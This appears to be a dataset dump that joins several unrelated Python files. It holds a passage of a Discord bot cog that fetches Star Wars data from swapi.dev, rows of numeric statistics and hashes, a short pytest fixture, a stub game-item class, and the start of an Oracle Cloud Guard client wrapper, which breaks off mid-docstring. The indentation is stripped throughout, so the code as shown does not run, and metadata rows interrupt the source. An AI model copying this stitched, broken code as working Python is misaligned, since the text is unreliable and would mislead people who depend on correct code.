if len(residents) != 0:
embed.add_field(name="Residents:", value="\n".join(residents))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/planets/?search=" + str(planet_id)
)
if response.status == 404:
return await ctx.send("Invalid Planet ID.")
planet = json.loads(await response.text())
name = planet["results"][0]["name"]
embed = discord.Embed(
title=f"Planet: {name}", description=PLANETDESCRIPTION[name], color=0x800080,
)
for key, value in planet["results"][0].items():
if key in [
"name",
"residents",
"films",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=PLANETTHUMBNAIL[name])
embed.set_image(url=PLANETS[name])
films = []
for film in planet["results"][0]["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
residents = []
for resident in planet["results"][0]["residents"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
if len(residents) != 0:
embed.add_field(name="Residents:", value="\n".join(residents))
await ctx.send(embed=embed)
@starwars.command()
async def film(self, ctx, film_id: Union[int, str]):
"""Gets the info about a film by their ID"""
if isinstance(film_id, int):
async with ctx.typing():
response = await self.session.get(r"https://swapi.dev/api/films/" + str(film_id))
if response.status == 404:
return await ctx.send("Invalid Film ID.")
film = json.loads(await response.text())
embed = discord.Embed(title=f"Film: {film['title']}; Page 1/4", color=0x0000FF)
embed.add_field(name="ID:", value=str(film_id))
for key, value in film.items():
if key in [
"name",
"characters",
"planets",
"starships",
"vehicles",
"species",
"created",
"edited",
"url",
"opening_crawl",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
embed2 = discord.Embed(title=f"Film: {film['title']}; Page 2/4", color=0x0000FF)
embed2.add_field(name="Opening Crawl", value=film["opening_crawl"])
embed3 = discord.Embed(title=f"Film: {film['title']}; Page 3/4", color=0x0000FF)
residents = []
for resident in film["characters"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
if len(residents) != 0:
embed3.add_field(name="Characters:", value="\n".join(residents))
planets = []
for planet in film["planets"]:
planet_num = int(planet.split(r"/")[-2])
response = await self.session.get(planet)
planet = json.loads(await response.text())
planets.append(f"Name: {planet['name']}; ID: {str(planet_num)}")
if len(planets) != 0:
embed3.add_field(name="Planets:", value="\n".join(planets))
embed4 = discord.Embed(title=f"Film: {film['title']}; Page 4/4", color=0x0000FF)
objects = []
for entry in film["starships"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Starships:", value="\n".join(objects))
objects = []
for entry in film["vehicles"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Vehicles:", value="\n".join(objects))
objects = []
for entry in film["species"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Species:", value="\n".join(objects))
embeds = [embed, embed2, embed3, embed4]
await menu(ctx, embeds, DEFAULT_CONTROLS)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/films/?search=" + str(film_id)
)
if response.status == 404:
return await ctx.send("Invalid Film ID.")
film = json.loads(await response.text())
name = film["results"][0]["title"]
embed = discord.Embed(title=f"Film: {name}; Page 1/4", color=0x0000FF)
for key, value in film["results"][0].items():
if key in [
"name",
"characters",
"planets",
"starships",
"vehicles",
"species",
"created",
"edited",
"url",
"opening_crawl",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
embed2 = discord.Embed(title=f"Film: {name}; Page 2/4", color=0x0000FF)
embed2.add_field(name="Opening Crawl", value=film["results"][0]["opening_crawl"])
embed3 = discord.Embed(title=f"Film: {name}; Page 3/4", color=0x0000FF)
residents = []
for resident in film["results"][0]["characters"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
if len(residents) != 0:
embed3.add_field(name="Characters:", value="\n".join(residents))
planets = []
for planet in film["results"][0]["planets"]:
planet_num = int(planet.split(r"/")[-2])
response = await self.session.get(planet)
planet = json.loads(await response.text())
planets.append(f"Name: {planet['name']}; ID: {str(planet_num)}")
if len(planets) != 0:
embed3.add_field(name="Planets:", value="\n".join(planets))
embed4 = discord.Embed(title=f"Film: {name}; Page 4/4", color=0x0000FF)
objects = []
for entry in film["results"][0]["starships"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Starships:", value="\n".join(objects))
objects = []
for entry in film["results"][0]["vehicles"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Vehicles:", value="\n".join(objects))
objects = []
for entry in film["results"][0]["species"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed4.add_field(name="Species:", value="\n".join(objects))
embeds = [embed, embed2, embed3, embed4]
await menu(ctx, embeds, DEFAULT_CONTROLS)
@starwars.command()
async def starship(self, ctx, starship_id: Union[int, str]):
"""Gets the profile of a starship by its ID"""
if isinstance(starship_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/starships/" + str(starship_id)
)
if response.status == 404:
return await ctx.send("Invalid Starship ID.")
starship = json.loads(await response.text())
embed = discord.Embed(
title=f"Starship: {starship['name']}",
description=STARSHIPDESCRIPTIONS[starship["name"]],
color=0x000000,
)
embed.add_field(name="ID:", value=str(starship_id))
for key, value in starship.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_image(url=STARSHIPSIMAGES[starship["name"]])
objects = []
for entry in starship["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in starship["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/starships/?search=" + str(starship_id)
)
if response.status == 404:
return await ctx.send("Invalid Starship ID.")
starship = json.loads(await response.text())
name = starship["results"][0]["name"]
embed = discord.Embed(
title=f"Starship: {name}",
description=STARSHIPDESCRIPTIONS[name],
color=0x000000,
)
for key, value in starship["results"][0].items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
objects = []
embed.set_image(url=STARSHIPSIMAGES[name])
for entry in starship["results"][0]["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in starship["results"][0]["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
@starwars.command()
async def vehicle(self, ctx, vehicle_id: Union[int, str]):
"""Gets the profile of a vehicle by its ID"""
if isinstance(vehicle_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/vehicles/" + str(vehicle_id)
)
if response.status == 404:
return await ctx.send("Invalid Vehicle ID.")
vehicle = json.loads(await response.text())
embed = discord.Embed(
title=f"Vehicle: {vehicle['name']}",
description=VEHICLEDESCRIPTION[vehicle["name"]],
color=0x228B22,
)
embed.add_field(name="ID:", value=str(vehicle_id))
for key, value in vehicle.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
objects = []
embed.set_image(url=VEHICLEIMAGE[vehicle["name"]])
for entry in vehicle["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in vehicle["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/vehicles/?search=" + str(vehicle_id)
)
if response.status == 404:
return await ctx.send("Invalid Vehicle ID.")
vehicle = json.loads(await response.text())
name = vehicle["results"][0]["name"]
embed = discord.Embed(
title=f"Vehicle: {name}", description=VEHICLEDESCRIPTION[name], color=0x228B22,
)
for key, value in vehicle["results"][0].items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
objects = []
embed.set_image(url=VEHICLEIMAGE[name])
for entry in vehicle["results"][0]["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in vehicle["results"][0]["pilots"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Pilots:", value="\n".join(objects))
await ctx.send(embed=embed)
@starwars.command()
async def species(self, ctx, species_id: Union[int, str]):
"""Gets the profile of a species by its ID"""
if isinstance(species_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/species/" + str(species_id)
)
if response.status == 404:
return await ctx.send("Invalid Species ID.")
species = json.loads(await response.text())
embed = discord.Embed(
title=f"Species: {species['name']}",
description=SPECIESDESCRIPTION[species["name"]],
color=0xD2B48C,
)
embed.add_field(name="ID:", value=str(species_id))
for key, value in species.items():
if key in [
"name",
"homeworld",
"films",
"people",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=SPECIESTHUMBNAIL[species["name"]])
homeworld_num = int(species["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(species["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
objects = []
for entry in species["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in species["people"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="People:", value="\n".join(objects))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/species/?search=" + str(species_id)
)
if response.status == 404:
return await ctx.send("Invalid Species ID.")
species = json.loads(await response.text())
name = species["results"][0]["name"]
embed = discord.Embed(
title=f"Species: {name}", description=SPECIESDESCRIPTION[name], color=0xD2B48C,
)
embed.add_field(name="ID:", value=str(species_id))
for key, value in species["results"][0].items():
if key in [
"name",
"homeworld",
"films",
"people",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=SPECIESTHUMBNAIL[name])
homeworld_num = int(species["results"][0]["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(species["results"][0]["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
objects = []
for entry in species["results"][0]["films"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['title']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="Films:", value="\n".join(objects))
objects = []
for entry in species["results"][0]["people"]:
entry_num = int(entry.split(r"/")[-2])
response = await self.session.get(entry)
entry = json.loads(await response.text())
objects.append(f"Name: {entry['name']}; ID: {str(entry_num)}")
if len(objects) != 0:
embed.add_field(name="People:", value="\n".join(objects))
await ctx.send(embed=embed)
@starwars.group(name="all")
async def _all_group(self, ctx):
"""Get all people, planets, starships, vehicles, species or films of star wars"""
pass
@_all_group.command()
async def people(self, ctx):
"""Grabs all people in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/people"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
persons_list = []
for person in data:
embed = discord.Embed(title=f"Person: {person['name']}", color=0x32CD32)
num = int(person["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in person.items():
if key in [
"name",
"homeworld",
"films",
"species",
"vehicles",
"starships",
"created",
"edited",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
homeworld_num = int(person["homeworld"].split(r"/")[-2])
embed.add_field(name="Homeworld", value=f"ID: {str(homeworld_num)}")
persons_list.append(embed)
persons_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, persons_list, DEFAULT_CONTROLS)
@_all_group.command()
async def planets(self, ctx):
"""Grabs all planets in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/planets"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
planets_list = []
for planet in data:
embed = discord.Embed(title=f"Planet: {planet['name']}", color=0x800080)
num = int(planet["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in planet.items():
if key in [
"name",
"residents",
"films",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
planets_list.append(embed)
planets_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, planets_list, DEFAULT_CONTROLS)
@_all_group.command()
async def films(self, ctx):
"""Grabs all films in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/films"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
films_list = []
for film in data:
embed = discord.Embed(title=f"Film: {film['title']}", color=0xD2B48C)
num = int(film["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in film.items():
if key in [
"name",
"characters",
"planets",
"starships",
"vehicles",
"species",
"created",
"edited",
"url",
"opening_crawl",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
films_list.append(embed)
films_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, films_list, DEFAULT_CONTROLS)
@_all_group.command()
async def starships(self, ctx):
"""Grabs all starships in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/starships"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
starships_list = []
for starship in data:
embed = discord.Embed(title=f"Starship: {starship['name']}", color=0x000000)
num = int(starship["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in starship.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
starships_list.append(embed)
starships_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, starships_list, DEFAULT_CONTROLS)
@_all_group.command()
async def vehicles(self, ctx):
"""Grabs all vehicles in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/vehicles"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
vehicles_list = []
for vehicle in data:
embed = discord.Embed(title=f"Vehicle: {vehicle['name']}", color=0x228B22)
num = int(vehicle["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in vehicle.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
vehicles_list.append(embed)
vehicles_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, vehicles_list, DEFAULT_CONTROLS)
@_all_group.command(name="species")
async def _all_species(self, ctx):
"""Grabs all vehicles in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/species"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
species_list = []
for species in data:
embed = discord.Embed(title=f"Species: {species['name']}", color=0xD2B48C)
num = int(species["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in species.items():
if key in [
"name",
"homeworld",
"films",
"people",
"edited",
"created",
"url",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
species_list.append(embed)
species_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, species_list, DEFAULT_CONTROLS)
| 48.735967
| 100
| 0.458365
| 4,544
| 46,884
| 4.663072
| 0.057658
| 0.03398
| 0.041909
| 0.049743
| 0.846619
| 0.818963
| 0.806975
| 0.793903
| 0.753693
| 0.743688
| 0
| 0.012076
| 0.411825
| 46,884
| 961
| 101
| 48.786681
| 0.75631
| 0.023654
| 0
| 0.70575
| 0
| 0
| 0.123934
| 0
| 0
| 0
| 0.004379
| 0
| 0
| 1
| 0.003382
| false
| 0.002255
| 0.007892
| 0
| 0.027058
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97ef752b83e615d9888b7b7f8458da11f1907e90
| 159
|
py
|
Python
|
stubalyzer/conftest.py
|
kialo/stub-analyzer
|
db702a23abda64a3f8e8debf5e175f62732ce827
|
[
"MIT"
] | 7
|
2019-11-04T13:02:09.000Z
|
2021-09-16T11:36:16.000Z
|
stubalyzer/conftest.py
|
kialo/stub-analyzer
|
db702a23abda64a3f8e8debf5e175f62732ce827
|
[
"MIT"
] | 9
|
2019-12-04T14:46:47.000Z
|
2022-01-03T15:29:53.000Z
|
stubalyzer/conftest.py
|
kialo/stub-analyzer
|
db702a23abda64a3f8e8debf5e175f62732ce827
|
[
"MIT"
] | null | null | null |
import pytest
from testing.util import MypyNodeFactory, mypy_node_factory
@pytest.fixture
def mypy_nodes() -> MypyNodeFactory:
return mypy_node_factory
| 17.666667
| 59
| 0.811321
| 20
| 159
| 6.2
| 0.65
| 0.129032
| 0.241935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132075
| 159
| 8
| 60
| 19.875
| 0.898551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
3f162555af2967f4dc9f7914c4f057f23bf0e254
| 121
|
py
|
Python
|
bflib/items/jewelry/base.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/items/jewelry/base.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/items/jewelry/base.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.items.base import Item
from bflib.items import listing
@listing.register_type
class Jewelry(Item):
pass
| 15.125
| 33
| 0.785124
| 18
| 121
| 5.222222
| 0.666667
| 0.191489
| 0.297872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14876
| 121
| 7
| 34
| 17.285714
| 0.912621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
3f2a37489eb60d8ee21ccc8ecc329c6cb23cf780
| 51,397
|
py
|
Python
|
src/oci/cloud_guard/cloud_guard_client_composite_operations.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/cloud_guard/cloud_guard_client_composite_operations.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/cloud_guard/cloud_guard_client_composite_operations.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class CloudGuardClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.cloud_guard.CloudGuardClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new CloudGuardClientCompositeOperations object
:param CloudGuardClient client:
The service client which will be wrapped by this object
"""
self.client = client
def create_data_mask_rule_and_wait_for_state(self, create_data_mask_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_data_mask_rule` and waits for the :py:class:`~oci.cloud_guard.models.DataMaskRule` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateDataMaskRuleDetails create_data_mask_rule_details: (required)
Definition for the new Data Mask Rule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DataMaskRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_data_mask_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_data_mask_rule(create_data_mask_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_mask_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_detector_recipe_and_wait_for_state(self, create_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipe` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateDetectorRecipeDetails create_detector_recipe_details: (required)
Details for the new DetectorRecipe.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_detector_recipe(create_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_managed_list_and_wait_for_state(self, create_managed_list_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_managed_list` and waits for the :py:class:`~oci.cloud_guard.models.ManagedList` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateManagedListDetails create_managed_list_details: (required)
Details for the new ManagedList.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ManagedList.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_managed_list`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_managed_list(create_managed_list_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_managed_list(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_responder_recipe_and_wait_for_state(self, create_responder_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_responder_recipe` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipe` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateResponderRecipeDetails create_responder_recipe_details: (required)
Details for ResponderRecipe.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_responder_recipe`
